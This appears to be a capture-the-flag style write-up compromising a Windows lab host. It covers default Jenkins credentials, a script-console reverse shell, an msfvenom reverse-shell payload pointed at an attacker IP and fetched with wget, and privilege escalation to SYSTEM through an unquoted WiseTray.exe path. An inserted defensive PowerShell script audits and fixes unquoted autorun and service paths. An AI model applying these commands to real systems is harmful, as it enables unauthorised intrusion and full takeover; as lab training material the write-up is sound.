Redefine Success
It All Begins Here
Nmap was used to enumerate the ports on the target machine: “nmap Target machine IP -A -p- -T4 -Pn -oA nmap”.
A website was found on port 8080 running ‘Jetty 9.4.41v20210516’; its robots.txt file disallows ‘/’.
A dirbuster scan was run.
Nothing relevant was shown in the dirbuster results or from inspection of the other ports. A brute force attack was attempted using the “Cluster Bomb” function of Burp Suite; after noticing that a PHP session cookie was assigned, a username and password of “jenkins” in both fields gave a successful login.
The alert icon gave warnings about security vulnerabilities within the Jenkins app.
Looking at what was available in the ‘Manage Jenkins’ section, the script console was accessible. After some research, arriving at “https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76”, there was a simple script that could be run to gain shell access to the system.
After setting up a netcat listener on the attacking system and clicking run, a shell is received as the butler user.
The “powershell” command was run, followed by: “wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe -OutFile winpeas.exe”. This grabbed the latest version of winpeas.exe, a common privilege escalation enumeration utility for Windows machines, from the GitHub repository.
Then winpeas.exe was run with “./winpeas.exe”.
In the results, there is a program, “WiseTray.exe”, that runs at the login of any user. This program has unquoted spaces in its file path, so if one has write permission to the folder (Wise Care 365), a file could be created there in order to run an arbitrary executable instead.
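The following audit script is an added example for the defending side and is not part of the original write-up: it checks the standard autorun registry keys and every service ImagePath for unquoted executable paths that contain spaces (the WiseTray.exe weakness above) and, with -Fix, wraps the executable portion in quotes. It assumes an elevated PowerShell session on the host being hardened.

```powershell
# Added example (not from the original write-up): find autorun and service
# entries whose executable path is unquoted and contains a space, which lets
# CreateProcess resolve to an unintended .exe along that path. Run elevated.
$autorunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)

function Test-UnquotedSpacedPath {
    param([string]$Command)
    # True when the command is not quoted and has a space before ".exe".
    if ([string]::IsNullOrWhiteSpace($Command)) { return $false }
    if ($Command.TrimStart().StartsWith('"')) { return $false }
    $exeEnd = $Command.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
    if ($exeEnd -lt 0) { return $false }
    return $Command.Substring(0, $exeEnd).Contains(' ')
}

function Repair-UnquotedPath {
    param([string]$Command)
    # Quote only the executable portion; any trailing arguments are kept as-is.
    $exeEnd = $Command.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase) + 4
    return '"' + $Command.Substring(0, $exeEnd) + '"' + $Command.Substring($exeEnd)
}

function Find-UnquotedAutoruns {
    param([switch]$Fix)
    foreach ($key in $autorunKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        # Skip the PS* metadata properties the registry provider adds.
        foreach ($name in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' }).Name) {
            $value = [string]$props.$name
            if (-not (Test-UnquotedSpacedPath $value)) { continue }
            [pscustomobject]@{ Location = $key; Name = $name; Command = $value }
            if ($Fix) { Set-ItemProperty -Path $key -Name $name -Value (Repair-UnquotedPath $value) }
        }
    }
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not (Test-UnquotedSpacedPath $svc.PathName)) { continue }
        [pscustomobject]@{ Location = 'Service'; Name = $svc.Name; Command = $svc.PathName }
        if ($Fix) {
            $regKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)"
            Set-ItemProperty -Path $regKey -Name ImagePath -Type ExpandString -Value (Repair-UnquotedPath $svc.PathName)
        }
    }
}

Find-UnquotedAutoruns | Format-Table -AutoSize   # add -Fix to rewrite the entries
```

Quoting the path removes the ambiguity; the second half of the fix is making sure that directories such as ‘Wise Care 365’ under Program Files are not writable by standard users.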
Msfvenom was used to create the reverse shell payload: “msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING IP LPORT=1337 -f exe > ~/practicalpentesting/butler/Wise.exe”.
After navigating to the directory where the ‘virus.exe’ file was left, a simple Python web server was started in order to pull the file to the target machine: “python -m http.server”.
The file was pulled to the ‘\Wise Care 365’ folder with powershell and wget.
PowerShell was exited while in the ‘Wise’ folder, and a command prompt was entered with “cmd.exe”. A netcat listener was set up on port 1337. Then the program was stopped and restarted so that it would be run as SYSTEM.
A shell is received as ‘nt authority\system’.